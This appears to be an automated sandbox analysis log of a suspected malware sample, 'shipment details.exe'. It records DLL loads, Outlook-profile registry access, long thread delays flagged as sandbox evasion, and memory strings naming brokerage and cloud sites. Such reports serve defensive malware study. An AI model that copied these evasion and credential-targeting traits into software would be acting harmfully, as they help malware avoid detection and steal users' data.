              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: shipment details.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: shipment details.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmp
              Source: shipment details.exeStatic PE information: 0x93CCF654 [Thu Jul 30 00:52:36 2048 UTC]
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD9233 push es; ret 1_2_06BD9244
              Source: shipment details.exeStatic PE information: section name: .text entropy: 7.802547137134015
              Source: C:\Users\user\Desktop\shipment details.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
              Source: C:\Users\user\Desktop\shipment details.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeMemory allocated: 4DA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599224Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598968Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598856Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598732Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598515Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598297Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597968Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597859Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597745Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597640Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597415Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597312Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596546Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596326Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595234Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595125Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 594797Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 594687Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 594578Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeWindow / User API: threadDelayed 2008Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeWindow / User API: threadDelayed 7806Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep count: 32 > 30Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -29514790517935264s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 2672Thread sleep count: 2008 > 30Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 2672Thread sleep count: 7806 > 30Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -599343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -599224s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -598968s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -598856s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -598732s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -598625s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -598515s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -598406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -598297s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -598187s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -598078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -597968s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -597859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -597745s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -597640s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -597531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -597415s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -597312s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -597203s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -597093s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596546s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596326s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596218s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -596000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -595890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -595781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -595672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -595562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -595453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -595343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -595234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -595125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -595015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -594906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -594797s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -594687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exe TID: 6220Thread sleep time: -594578s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599224Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598968Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598856Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598732Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598515Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598297Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597968Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597859Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597745Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597640Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597415Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597312Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596546Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596326Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595234Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595125Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 594797Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 594687Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeThread delayed: delay time: 594578Jump to behavior
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
